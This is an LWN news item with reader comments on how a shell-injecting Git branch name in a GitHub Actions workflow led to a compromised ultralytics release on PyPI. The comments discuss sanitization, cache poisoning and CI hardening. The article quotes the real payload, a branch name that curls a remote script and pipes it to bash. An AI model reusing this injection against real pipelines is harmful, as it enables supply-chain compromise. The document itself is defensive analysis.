|
|
Subscribe / Log in / New account

Abusing Git branch names to compromise a PyPI package

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.

This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.



to post comments

Usernames

Posted Dec 6, 2024 19:04 UTC (Fri) by quotemstr (subscriber, #45331) [Link] (14 responses)

This experience should inform the discussion on user name sanitization at https://lwn.net/Articles/1000485/

I come down *hard* for limiting identifiers to the smallest possible character set, especially in non-user-facing contexts. Programming identifiers should be printable ASCII characters with no whitespace. KISS.

Usernames

Posted Dec 6, 2024 19:58 UTC (Fri) by epa (subscriber, #39769) [Link]

And in an environment where you want to be extra paranoid, don’t just limit to ASCII printable but to “word characters” and perhaps limited punctuation like .-_

Even then you should be stricter with the first character since strings beginning - can still cause mischief in shell command lines or some languages such as Tcl.

Usernames

Posted Dec 7, 2024 1:52 UTC (Sat) by geofft (subscriber, #59789) [Link] (2 responses)

Unfortunately, that wouldn't have helped in this case: all the characters in this string were printable ASCII with no whitespace (hence ${IFS} to get a space).

I would agree it doesn't make sense to allow things like dollar signs in usernames. I do think there's merit in considering permitting alphanumeric characters from other alphabets (accented Latin letters, Arabic, Devanagari, Hiragana, etc.)—but not their punctuation or whitespace, either. (Of course even this proposal deserves some careful consideration.)

Usernames

Posted Dec 7, 2024 14:54 UTC (Sat) by quotemstr (subscriber, #45331) [Link] (1 responses)

Sure. I'd actually want to apply David Wheeler's entire sanitization program; https://dwheeler.com/essays/fixing-unix-linux-filenames.html

Banning literal terminal control codes in usernames would merely be a good start

Usernames

Posted Dec 8, 2024 3:51 UTC (Sun) by geofft (subscriber, #59789) [Link]

Oh, yeah, the rules proposed on that web page, at the very bottom, sound along the lines of what I was thinking - they do permit accented or non-Latin letters (which aren't currently allowed for usernames) and mandate UTF-8 encoding for those, but they forbid punctuation that is meaningful to the shell.

Usernames

Posted Dec 7, 2024 15:26 UTC (Sat) by mathstuf (subscriber, #69389) [Link] (9 responses)

Maybe. I think the core issue is that PR pipelines had access to secrets to publish at all, not just "someone could do some crazy thing to make a workflow do something unexpected". I am not really sure how GHA secrets work, but GitLab is really simple in that I can lock secrets to:

- protected branches
- jobs with a specific "environment" tag attached to them

I think there is absolutely no reason that PR CI pipelines/workflows should have any access to *any* secrets regardless of whether they can be coaxed into doing unintended things or not.

Usernames

Posted Dec 7, 2024 16:39 UTC (Sat) by excors (subscriber, #95769) [Link] (8 responses)

> I think the core issue is that PR pipelines had access to secrets to publish at all

According to https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-... (previously linked by nickodell), the exploited workflow didn't have permissions to publish directly, but the exploit probably used cache poisoning as a method of privilege escalation. (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)

As detailed in https://adnanthekhan.com/2024/05/06/the-monsters-in-your-... , GitHub Actions has (optional) caching support for the inputs and outputs of workflows. The cache server uses branches as the security boundary: cache entries written by a workflow in a given branch can only be read by workflows in the same branch or a descendant (pull requests, forked projects, etc). In this case, the exploited workflow is configured as pull_request_target which is triggered by a pull request but executes in the project's main branch (unlike pull_request which executes in the pull request's branch, I think). That means it can write arbitrary data into the main branch's cache, and any other workflows running in the main branch with caching enabled will read from that poisoned cache.

That includes the workflow that signs and publishes artifacts to PyPI, which uses a pip cache for the standard dependencies of the publish scripts. The attacker can insert their own files into the pip cache, allowing arbitrary code execution in the publish workflow.

The cache poisoning article recommends "Never run untrusted code within the context of the main branch if any other workflows use GitHub Actions caching", and the zizmor article says pull_request_target is "a fundamentally dangerous workflow trigger". GitHub's documentation doesn't go that far, but does mention cache poisoning and other dangers with pull_request_target (https://docs.github.com/en/actions/writing-workflows/choo...).

It looks like Ultralytics violated multiple security best practices here - but on the other hand, it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.

Usernames

Posted Dec 7, 2024 21:05 UTC (Sat) by mathstuf (subscriber, #69389) [Link] (7 responses)

Thanks, I had missed that link. Yes, the cache poisoning movement is interesting… Probably more cloud-resident relevant (we have our own fleet of runners for our GitLab instance for $VARIOUS_REASONS). I know we use fleet-wide caching for Linux compilations and host-wide compiler caching for macOS and Windows. I see a few projects using caches for `cargo`, but I *believe* that `cargo` will hash verify before actually using anything from it. Is `pip` missing hash verification somewhere? Maybe we need the payload to know?

> (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)

Ugh. "Fix formatting" commits are pretty much the epitome of useless commit noise. Useless diff, useless commit message. I've gone over that in comments here previously; I'll avoid rehashing it again.

> it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.

Yes…I've mostly done GitLab-CI, but every time I visit GHA I am rebuffed by its (to me) unnecessary complexity.

Cache poisoning in CI

Posted Dec 8, 2024 4:17 UTC (Sun) by geofft (subscriber, #59789) [Link] (1 responses)

cargo, I believe, caches source code globally (user-wide) and build artifacts per project, including build artifacts for dependencies. Source code has checksums that are attested by the registry, but build artifacts are likely going to change per environment, so I believe they do not get any hash checking. If you preserve ~/.cargo alone then cache poisoning is probably difficult (though I bet there are attacks based on poisoning things like ~/.cargo/config.toml that are strictly speaking not part of the cache). If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.

pip, on the other hand, caches build artifacts globally (user-wide), in the sense that an upstream project that only provides source code gets built into binary form (a wheel) locally by itself, and then that wheel is installed into whichever environment you're running pip on. As with the cargo situation, there's nothing to chain hash verification to for a locally-built binary artifact. But because the binary artifacts are shared, cache poisoning is indeed easy.

I can't think of a way to solve either of these robustly - any place that you store the hash of the output is going to be as vulnerable as the output itself, no? I think the only thing you can do is to make the cache read-only when doing builds of attacker-controlled code, and only write to the cache on CI runs triggered post merge (or if the PR author is trusted). This appears to be less than straightforward with github.com/actions/cache, and I'm very much not sure if that really makes the cache read-only or if it only skips an intentional write, such that a sufficiently clever attacker-controlled script can talk to the cache API itself and do a write with the same credentials used to read the cache.

(Also, the pip ecosystem includes the option to get binaries from the registry, and it is standard practice to provide and to use these binaries - this makes sense because Python users are generally not expected to have a working C toolchain since they're writing an interpreted language, but Rust is a compiler itself and needs at least a linker and the libc development library/headers from a C toolchain, so Python users benefit much more than Rust users from precompiled libraries. I don't know off hand if pip is good at verifying the hash of a wheel in the cache that is attested in the registry, or if it doesn't distinguish such wheels from locally-built wheels.)

Cache poisoning in CI

Posted Dec 8, 2024 7:35 UTC (Sun) by mathstuf (subscriber, #69389) [Link]

Even with the cache, we still update the index on every pipeline, so one would need to intercept that. I suppose one could put bad things into the cache with a dedicated MR, but I'm not sure how one would make `master` use it blindly as it is set up to still ask `crates.io`. I suppose it hinges on whether already-downloaded things are actually re-verified or not when using them. Something to test…

> If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.

Yeah, that seems a lot easier to target. For compilation, we use `sccache`. Not only does this get us cache hits across crates, but it also means we're not limited to storing only "the last version built" in the cache.

Usernames

Posted Dec 8, 2024 10:25 UTC (Sun) by excors (subscriber, #95769) [Link] (4 responses)

> Is `pip` missing hash verification somewhere?

This is getting far beyond my ability to research it with even a little bit of confidence, so you definitely shouldn't trust what I'm saying. But I get the impression that the GitHub Actions pip cache works by caching ~/.cache/pip, which includes both downloaded files and locally-built wheels (to save the cost of rebuilding packages before installing). There's no way to verify the integrity of those wheels, so an attacker tampering with them will cause trouble.

(The download cache may not be very secure either: "By default, pip does not perform any checks to protect against remote tampering and involves running arbitrary code from distributions" (https://pip.pypa.io/en/stable/topics/secure-installs/). It checks the (optional) hashes provided by index servers as "a protection against download corruption", not for security. You can improve that by specifying hashes in the local requirements.txt, though I don't know if verification happens before or after the cache.)

Usernames

Posted Dec 8, 2024 14:02 UTC (Sun) by mathstuf (subscriber, #69389) [Link]

Hopefully clarifications (and any relevant improvements) can come from trailofbits and others working on the PyPI security story.

Usernames

Posted Dec 8, 2024 22:51 UTC (Sun) by meejah (subscriber, #162580) [Link]

pip can be told to verify the hashes of the wheels it downloads. This isn't necessarily "hard" per se, but is an extra step so many projects don't bother shipping such hash requirements.

That is, an end-user application can ship a "requirements.txt" file that contains hashes for all possible wheels for all exact versions of every requirement, and then pass `--require-hashes`. One problem is that it's "all possible wheels at some point in time" and authors may upload previously-non-existent wheels later.

I don't believe there's any way to declare your dependencies with hashes (e.g. a Python library or application can say "I depend on foo == 1.2.3" but cannot specify the hashes -- and yes, there are usually many because wheels are architecture / platform specific).

Usernames

Posted Dec 8, 2024 23:31 UTC (Sun) by randomguy3 (subscriber, #71063) [Link] (1 responses)

If pip is looking in the cache to satisfy a request for a wheel it would otherwise have downloaded, it will indeed verify that the hash of the local wheel matches the server-reported hash of the file it would have downloaded.

I've occasionally run into this when some badly-behaved project overwrote a wheel (on a company-internal server) and all the builds that had existing caches broke!

Usernames

Posted Dec 8, 2024 23:33 UTC (Sun) by randomguy3 (subscriber, #71063) [Link]

To be clear: the builds broke because in this situation, pip doesn't attempt to fix the cache, but instead errors out (which isn't an unreasonable action from a security standpoint).

How to fix the whole catagory of shell injection

Posted Dec 6, 2024 19:16 UTC (Fri) by raven667 (subscriber, #5198) [Link] (21 responses)

Relying on the interactive shell for automation in the presence of malicious input, where features useful for interactive use and personal scripts (globbing and splitting arguments, subshells and various expansions) are dangerous across a security boundary and a constant source of problems because it's _so_ easy to naively invoke a shell. I'm sure greater minds have tried tackling this problem and failed, but could we design a non-interactive mode for at least one common shell that optionally disables subshells and variable expansions, with a `set` command or cli option, so that language runtimes (like PHP) and utilities (like git) could default to the more-secure shell subset that wouldn't be susceptible to this kind of shenanigans. Shellshock, the recent PaloAlto issues, now this plus all the places I've seen people use $() / `` / system() instead of creating an ARGV or just putting $var in a shell script without quoting, let alone something fancier like "${var[@]}" or recognizing that $(( )) shell math can also run commands.

Maybe tracing each code path which can result in fork() back to the beginning and putting a flag around each source that can turn it off/on so someone can create an allow list of what kinds of invocations they are willing to allow in their automation. People will probably hate it as much as SELinux if they have to enable things when their existing scripts break, but we'd have to make a collective decision as to what we value more, between system integrity and the work to actually enumerate all that should be allowed.

Maybe this could be a pragma comment in the scripts, like how you can ignore warnings with shellcheck, so you can say "yes please interpret and expand the arguments in this command" when that _is_ what you want to do in a way that is visible in the script.

Whatever we do, allowing data across a security boundary into an interactive command interpreter is a bad and dangerous thing to do, and we should make it easier to _not_ do that, which seems to be an impossible bar right now.

How to fix the whole catagory of shell injection

Posted Dec 6, 2024 19:51 UTC (Fri) by excors (subscriber, #95769) [Link] (7 responses)

As far as I can tell, shell expansion is not relevant in this case:

GitHub Actions workflows are defined in YAML files, where you can use syntax like ${{github.ref}} in values. Those will be expanded by the action runner when it executes the workflow. (https://docs.github.com/en/actions/writing-workflows/choo...)

One of the values in the YAML file is a shell script to execute. If you use ${{github.ref}} in there, the attacker-provided branch name will be inserted before the script is passed to the shell. The attacker doesn't even need to use $(...) in the branch name, they can simply use "; to exit from the current shell command and start a new one, and the shell sees a totally normal sequence of basic commands. (See PoC in https://github.com/advisories/GHSA-7x29-qqmq-v6qc , which is a different but similar vulnerability in exactly the same project a few months ago.)

I think the specific vulnerability here is fixed in https://github.com/ultralytics/actions/commit/89c1f380073... by moving all the ${{...}} out of the shell script block and into the 'env' block where they can't do any harm (although actually the branch name was removed entirely; presumably they didn't need it at all).

GitHub warns about this problem at https://docs.github.com/en/actions/security-for-github-ac...

How to fix the whole catagory of shell injection

Posted Dec 6, 2024 20:37 UTC (Fri) by wahern (subscriber, #37304) [Link] (2 responses)

This highlights the real problem, mixed data and code. Emphasis on sanitization seems misguided. Sanitization has value in the sense of defense in depth, but it's the wrong way to think about things. Where ever data and code are intermixed, the proper fix is always to separate them, preferably before an exploit is ever identified. Too many people jump straight to the sanitization issue, but not only does it not address the root problem, often it's a much thornier problem to resolve. In this case, as in most, you don't have to decide what characters should be valid in a branch name to solve an issue like this. More over, if you don't fix the issue properly, you leave the door open--maybe you got the character filter wrong, or maybe the semantics of evaluation changed (or were misdiagnosed) so it doesn't rely on special characters.

How to fix the whole catagory of shell injection

Posted Dec 6, 2024 21:14 UTC (Fri) by jwarnica (subscriber, #27492) [Link]

The SQL world mostly figured this out decades ago (if not always used) with parameters, basically making injection attacks impossible.

How to fix the whole catagory of shell injection

Posted Dec 7, 2024 11:02 UTC (Sat) by epa (subscriber, #39769) [Link]

The attacker only has to be lucky once. You need to sanitize input because there will be a mistake somewhere in the separation of data and code. And you need to separate data and code because there will be missing sanitation somewhere. As you say, defence in depth: but that’s the only possible approach in a system that might be exposed to a public network.

But even without any attacker, constraining inputs is still good practice, I feel. It saves you time debugging later when a stray space character got into a value and (even though you were not mixing data and code) no longer compared equal to the value without a leading space. Something like a git branch name (or a username) is not the place to allow the full flowering of human creativity with special characters. There are plenty of commit message and comment fields for that.

How to fix the whole catagory of shell injection

Posted Dec 7, 2024 5:59 UTC (Sat) by raven667 (subscriber, #5198) [Link] (2 responses)

yeah, I just read through those details and that matters a bit in this case, if you are using another template system to programmatically create a shell script then that provides more avenues for code injection. In this specific case, wouldn't it make sense for GitHub to scan actions yaml files and flag any `run:` sections which have `${{` variable expansions in them and at least link to their warning document.

What if multiple commands on a single line using `;` was also a flagged feature and not enabled by default or able to be disabled? I'm not smart enough to figure out a whole system on my own but I keep thinking we should find something as effective as SQL bind variables are in stopping unexpected command interpretation that can be applied to shell scripting, maybe the wholesale separation of the shell implementation used for interactive CLIs and for scripting and automation, to make the little bits of automation that are sprinkled _everywhere_ safer.

How to fix the whole catagory of shell injection

Posted Dec 7, 2024 10:02 UTC (Sat) by NYKevin (subscriber, #129325) [Link] (1 responses)

The proper solution is to stop trying to interact with shells programmatically. Everything you can do with a shell can also be done with your favorite non-shell programming language. There are only two "good" reasons to use a shell:

* Interactive use by a human.
* Scripting of things that would otherwise be done interactively by a human (as a timesaving measure for human sysadmins, not as something you programmatically invoke in production).

Everything else is an antipattern, where the shell has been co-opted to replace a missing feature in another program (often using the shell's -c flag).

How to fix the whole catagory of shell injection

Posted Dec 7, 2024 20:15 UTC (Sat) by raven667 (subscriber, #5198) [Link]

I think that is where my half-formed thought was going, in this specific case the commands could just be an array of yaml strings and the ci could parse into an argv before applying template variable replacement. That wouldn't work when you have some if/then logic but a shell-like dsl with a very restricted feature set could make transition easier, or just building expression evaluation into the yaml along with your template engine, similar to how Ansible has Python/Jinja `when:` expressions, there is some customization/integration to be sure but they didn't have to invent a whole custom system, and experience with the library transfers between different tools in the same ecosystem.

I'm just frustrated at seeing this same kind of problem again

How to fix the whole catagory of shell injection

Posted Dec 7, 2024 10:57 UTC (Sat) by fishface60 (subscriber, #88700) [Link]

> moving all the ${{...}} out of the shell script block and into the 'env' block where they can't do any harm

I see this bug everywhere, these yaml templating engines should require a schema define how to escape interpolated values (e.g. like ninja shell escapes everything in a command context) or that part of your data format doesn't support interpolation.

How to fix the whole catagory of shell injection

Posted Dec 6, 2024 20:16 UTC (Fri) by Wol (subscriber, #4433) [Link]

> Maybe this could be a pragma comment in the scripts, like how you can ignore warnings with shellcheck, so you can say "yes please interpret and expand the arguments in this command" when that _is_ what you want to do in a way that is visible in the script.

The Pr1mos shell (early 80s) had something exactly like this. I don't remember the details, but v18 had a Command Processor Language (CPL) with all sorts of globbing. That then became part of the shell proper with v19. And I do remember something about switches where you could tell the shell to glob or not glob, and stuff like that. It's too long ago, but I do miss that power - so much of the past has been lost ...

Cheers,
Wol

How to fix the whole catagory of shell injection

Posted Dec 6, 2024 21:10 UTC (Fri) by rweikusat2 (subscriber, #117920) [Link] (6 responses)

Hmm ... sorry but if someone writes code which generates an executable script/ program by interpolating unvalidated user input into a text template, then, he deserves anything which befalls him because of this. The solution to that is not crippling the command interpreter which will be used to execute this suicide-cript but (emphatically) "Don't do that!"

At best, one could argue that GitHub shouldn't even provide such a feature because it's basically impossible to use it safely.

How to fix the whole catagory of shell injection

Posted Dec 6, 2024 21:15 UTC (Fri) by pizza (subscriber, #46) [Link] (5 responses)

> At best, one could argue that GitHub shouldn't even provide such a feature because it's basically impossible to use it safely.

But... it has an OpenSSF best practices badge, therefore it's safe and secure!

How to fix the whole catagory of shell injection

Posted Dec 6, 2024 21:47 UTC (Fri) by david.a.wheeler (subscriber, #72896) [Link] (4 responses)

> But... it has an OpenSSF best practices badge, therefore it's safe and secure!

I know you're being sarcastic, but I thought I should respond.

I'm technical lead of the OpenSSF Best Practices badge work. We know better than to claim *that*! If you look at the front page <https://www.bestpractices.dev> it says:

>> Consumers of the badge can quickly assess which FLOSS projects are following best practices and as a result are more likely to produce higher-quality secure software.

Unless you're making formal proofs of the code, "more likely" is all any list of criteria can hope to do. Thinking is *still* required. Thinking will be required next year, too :-).

Bash Replacement - Rust Scripts

Posted Dec 7, 2024 10:03 UTC (Sat) by ma4ris8 (subscriber, #170509) [Link] (3 responses)

Currently Bash is widely supported in editors,
but making non-trivial secure Bash scripts is difficult.
Are Rust scripts promoted as an alternative?

Bash Replacement - Rust Scripts

Posted Dec 7, 2024 15:36 UTC (Sat) by smcv (subscriber, #53363) [Link]

If you can inject arbitrary code into a template that is subsequently run as a script (as in this particular vulnerability), it doesn't really matter whether it's arbitrary shell execution, arbitrary Rust execution, or any other language like Python or Lua - arbitrary code is arbitrary code.

Shell script makes it very hard to avoid *other* vulnerabilities, but *this* vulnerability wasn't a shell problem.

Bash Replacement - Rust Scripts

Posted Dec 7, 2024 23:21 UTC (Sat) by jengelh (guest, #33263) [Link] (1 responses)

There many languages which had ambitions to replace shell scripts as a "safer" alternative. But every now and then there are features of sh that, when written in the new language, amount to more code than before.

while read x y z; do foo "$x" | bar "$y" | baz "$z"; done <file

Now do that in Perl, Python, Lua, anything (or Rust if you insist). Whenever you need more than three lines, sh syntax "wins", as users like the terse-ness.

Bash Replacement - Rust Scripts

Posted Dec 9, 2024 10:44 UTC (Mon) by taladar (subscriber, #68407) [Link]

Terseness has advantages in interactive use but in scripts it really isn't necessary, especially if you are just talking about the same amount of tokens spread over more lines.

How to fix the whole category of shell injection

Posted Dec 6, 2024 23:34 UTC (Fri) by ballombe (subscriber, #9523) [Link] (3 responses)

Much maligned perl has taint mode that require input to be validated before being used.

How to fix the whole category of shell injection

Posted Dec 7, 2024 6:08 UTC (Sat) by raven667 (subscriber, #5198) [Link] (2 responses)

I *love* that about Perl and wonder why this kind of pervasive variable validation/tracking isn't present in more languages. Its so darn useful. Maybe `my ($number) = $cgi->param('number') =~ m/^(\d+)$/;` isn't the prettiest thing, but it's effective.

How to fix the whole category of shell injection

Posted Dec 9, 2024 10:46 UTC (Mon) by taladar (subscriber, #68407) [Link] (1 responses)

As far as I recall Ruby had that originally too, not sure if it is still around.

The main problem I see with a general taint flag on input is that tainted data is really not well defined. Data could be e.g. perfectly fine for use in a shell script but cause an injection in SQL or HTML.

How to fix the whole category of shell injection

Posted Dec 9, 2024 11:15 UTC (Mon) by farnz (subscriber, #17727) [Link]

Taint is well-defined, and doesn't mean "unsafe to use"; it means that the data came from an untrusted source, and has not yet been either validated for safety, or parsed into a trusted format.

The idea is that you have a "taint removal" layer that carefully handles potentially dangerous data, and converts it to a safe form or an error; most of your code doesn't go near the dangerous data, and the code that does can be carefully audited for correctness. Then, any injection bugs must either be in the "taint removal" layer, or in the layer that turns "safe" internal data into external data.

And note that this is a natural pattern in languages with strict type systems; you have parsers that takes input and turns it into internal structures, then you do your work on the internal structures, and you convert again from internal to external structures as you interact with other programs.

How to fix the whole catagory of shell injection

Posted Dec 7, 2024 16:35 UTC (Sat) by eru (subscriber, #2753) [Link]

Perl has this concept of tainted data, which perhaps would help.

LWN "also impacted"

Posted Dec 6, 2024 20:32 UTC (Fri) by Bigos (subscriber, #96807) [Link] (2 responses)

This message has also "compromised" LWN as the branch name is so long that makes the right pane take 80% of the space, leaving the left pane with articles very narrow.

Maybe break the branch name so that it is over several lines?

LWN "also impacted"

Posted Dec 6, 2024 20:45 UTC (Fri) by daroc (editor, #160859) [Link] (1 responses)

D'Oh! This is what I get for using the one-column view as the default. Just a minute.

LWN "also impacted"

Posted Dec 6, 2024 21:03 UTC (Fri) by daroc (editor, #160859) [Link]

The front page should be fixed — although I took the lazy way out and added optional line breaks instead of actually getting the CSS correct.

Linting GitHub workflows for escalation-of-privilege vulnerabilities

Posted Dec 6, 2024 22:16 UTC (Fri) by nickodell (subscriber, #125165) [Link]

William Woodruff has been working on a tool which analyzes GitHub workflow files, and looks for insecure design choices. He claims that it would have found the ultralytics issue. Have not tried this personally, but it seems like an interesting idea.

https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-...

"Some surprising code execution sources in bash"

Posted Dec 7, 2024 10:41 UTC (Sat) by rudis (subscriber, #130572) [Link]

This is a good time to mention https://yossarian.net/til/post/some-surprising-code-execu... which mentions further problems with bash (and possibly other shells) even when no direct injection is happening.

Additional malware versions released

Posted Dec 7, 2024 20:26 UTC (Sat) by ewen (subscriber, #4772) [Link]

It appears two further malware infected package versions were released in the last 24 hours:

https://github.com/ultralytics/ultralytics/issues/18027#i...

And the current theory is those were uploaded directly to PyPI, presumably using stolen credentials (eg a PAT — personal access token), since there doesn’t seem to be a matching GitHub CI run.

See also the summary from the repo owner:

https://github.com/ultralytics/ultralytics/pull/18018#iss...

But also note some of the details are disputed by one of the security researchers who looked into it in detail yesterday (and did a large write up linked by others earlier):

https://github.com/ultralytics/ultralytics/issues/18027#i...

So it appears there’ll need to be more cleanup from the attacker having got in via string interpolation issues :-/ And meanwhile a bunch of packages depending on the impacted package have locked the version to the last release before the malware infected versions and/or suggested their users check for and remove the affected versions.

I guess we should be glad it’s “just” a crypto miner this time (which is fairly noisy / obvious due to the CPU usage).

Ewen

Microsoft had a good idea

Posted Dec 8, 2024 12:48 UTC (Sun) by cbcbcb (subscriber, #10350) [Link] (16 responses)

Microsoft had a good idea when they invented the "C:\Documents and Settings" directory. It meant that all Windows software routinely encountered filenames with spaces, and it had to be fixed.

It would be rather inconvenient to rename “/home“ as “/home$(touch /tmp/security_bug)“, but I bet you'd still find a lot of broken filename handling if you did

Microsoft had a good idea

Posted Dec 8, 2024 13:14 UTC (Sun) by mb (subscriber, #50428) [Link] (1 responses)

I get the idea and I generally agree. But file names can't have / or NUL in them. :)

Microsoft had a good idea

Posted Dec 8, 2024 13:33 UTC (Sun) by cbcbcb (subscriber, #10350) [Link]

You can... you just need a couple of nested directories to do it :)

Microsoft had a good idea

Posted Dec 8, 2024 19:52 UTC (Sun) by eru (subscriber, #2753) [Link]

Windows has its own super-weird filename restrictions. You cannot use a device name as a pathname component, and this even includes names with a dot and a suffix. Sometimes trips you up when copying files from other operating systems, where something like "aux.c" is a perfectly reasonable name.

Microsoft had a good idea

Posted Dec 9, 2024 6:09 UTC (Mon) by lkundrak (subscriber, #43452) [Link] (8 responses)

I think they renamed it to "C:\Users" in more recent versions, and "Documents and Settings" is merely a symlink/junction (or the other way around?). Wondering why.

Microsoft had a good idea

Posted Dec 9, 2024 8:00 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) [Link] (4 responses)

WSL (10 characters)

Microsoft had a good idea

Posted Dec 9, 2024 9:06 UTC (Mon) by zdzichu (subscriber, #17118) [Link] (2 responses)

Could you expand a little? WSL is a Linux API implementation (1) or Linux itself (2), neither have a problem with longer filenames with spaces.

Microsoft had a good idea

Posted Dec 9, 2024 18:33 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) [Link] (1 responses)

> neither have a problem with longer filenames with spaces.

Try setting your $HOME to a path with spaces, and watch the errors roll in as all kinds of scripts start breaking. GUI utils typically work fine, but anything with the shell scripts just cracks.

Microsoft had a good idea

Posted Dec 11, 2024 16:59 UTC (Wed) by jezuch (subscriber, #52988) [Link]

So.... Windows fixed this and then they pulled the Unix stuff and had to accommodate all the broken stuff in it?

Oh the irony!

Microsoft had a good idea

Posted Dec 9, 2024 10:26 UTC (Mon) by leromarinvit (subscriber, #56850) [Link]

Can't be the reason. They renamed it in Vista IIRC (certainly no later than Windows 7), long before WSL.

Microsoft had a good idea

Posted Dec 9, 2024 10:24 UTC (Mon) by excors (subscriber, #95769) [Link] (2 responses)

It changed in Vista, when many APIs were limited to a MAX_PATH of 260 bytes. I can't find any official explanations but there are plausible claims that the renaming from "C:\Documents and Settings\foo\Application Data\..." to "C:\Users\foo\AppData\..." was specifically to shorten paths and allow applications to have more deeply nested folder structures.

Microsoft had a good idea

Posted Dec 9, 2024 16:54 UTC (Mon) by raven667 (subscriber, #5198) [Link] (1 responses)

This is the likely technical reason, but it's also nice to bring the structure into alignment with MacOSX and use a friendly to read name with capitalization, making the one small detail of where user-managed files are platform agnostic `/Users/$username/Documents` everywhere. Now I'm wondering if any of the desktop oriented Linux distros considered making this change, with a compat symlink for /home.

Microsoft had a good idea

Posted Dec 12, 2024 9:47 UTC (Thu) by mgedmin (subscriber, #34497) [Link]

> Now I'm wondering if any of the desktop oriented Linux distros considered making this change, with a compat symlink for /home.

GoboLinux, which I've never tried personally. I don't think it has any compatibility symlinks, just a directory tree with /Programs, /Users, etc.

Microsoft had a good idea

Posted Dec 9, 2024 21:47 UTC (Mon) by bearstech (subscriber, #160755) [Link] (3 responses)

I once used "&" in a folder name. It broke so many things, it was scary, I gave up with the name.

Microsoft had a good idea

Posted Dec 10, 2024 8:12 UTC (Tue) by Wol (subscriber, #4433) [Link] (2 responses)

We had a system that used "*" as a matter of course in (Windows) file names. It was originally from a completely different OS (Pr1mos, of course, which used @ and = as wildcards), so they just ported it and didn't think about the implications ...

The number of programs (backup especially) that tried to glob the filename and then broke spectacularly ...

Cheers,
Wol

Microsoft had a good idea

Posted Dec 10, 2024 11:22 UTC (Tue) by taladar (subscriber, #68407) [Link] (1 responses)

That must have been particularly bad on Windows since Windows programs implement globbing themselves instead of letting a shell do it.

Microsoft had a good idea

Posted Dec 10, 2024 12:40 UTC (Tue) by Wol (subscriber, #4433) [Link]

Made even worse because on Pr1mos dot-extensions were a (new) convention at the time, while on Windows they are (almost) mandatory.

So with most of the * files being extensionless, the globbing really went mad (I think it actually went recursive!), and until we realised and put a bug in against the backup software, it caused us quite a bit of grief. Telling "our" software not to use *'s was not an option ...

Cheers,
Wol

The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.

Posted Dec 10, 2024 1:19 UTC (Tue) by jthill (subscriber, #56558) [Link] (2 responses)

branchname='<that mess>'
git check-ref-format refs/heads/"$branchname" || die no that does not look good

The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.

Posted Dec 10, 2024 7:54 UTC (Tue) by excors (subscriber, #95769) [Link] (1 responses)

I think that's not correct. The only part of <that mess> check-ref-format objects to is the ":", but that's not actually part of the branch name. The GitHub pull request is displaying "repositoryname:branchname", and the branch name passed into ${{github.ref}} will be "refs/heads/$({curl,...)" which check-ref-format accepts.

(check-ref-format does reject spaces, which is presumably why the branch name uses ${IFS} instead. It also rejects ASCII control characters, '~', '^', '?', '*', '[', '..', '//', '@{', '\', etc, and says "These rules make it easy for shell script based tools to parse reference names, pathname expansion by the shell when a reference name is used unquoted (by mistake), and also avoid ambiguities in certain reference name expressions" [I think it meant to say "*avoid* pathname expansion"?]. But if it's meant to be safe when mistakenly used unquoted, why does it still allow '$'?)

The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.

Posted Dec 10, 2024 9:24 UTC (Tue) by jthill (subscriber, #56558) [Link]

I see you're correct. Yow. That's painful. I've probably made this mistake myself then.

Unless I'm still blindspotting, $branchname expanded, quoted or not, still won't be expanded again unless rescanned, like the expansion being passed to bash -c or something instead of the var being passed in the environment for the invoked bash to expand just the once itself.


Copyright © 2024, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds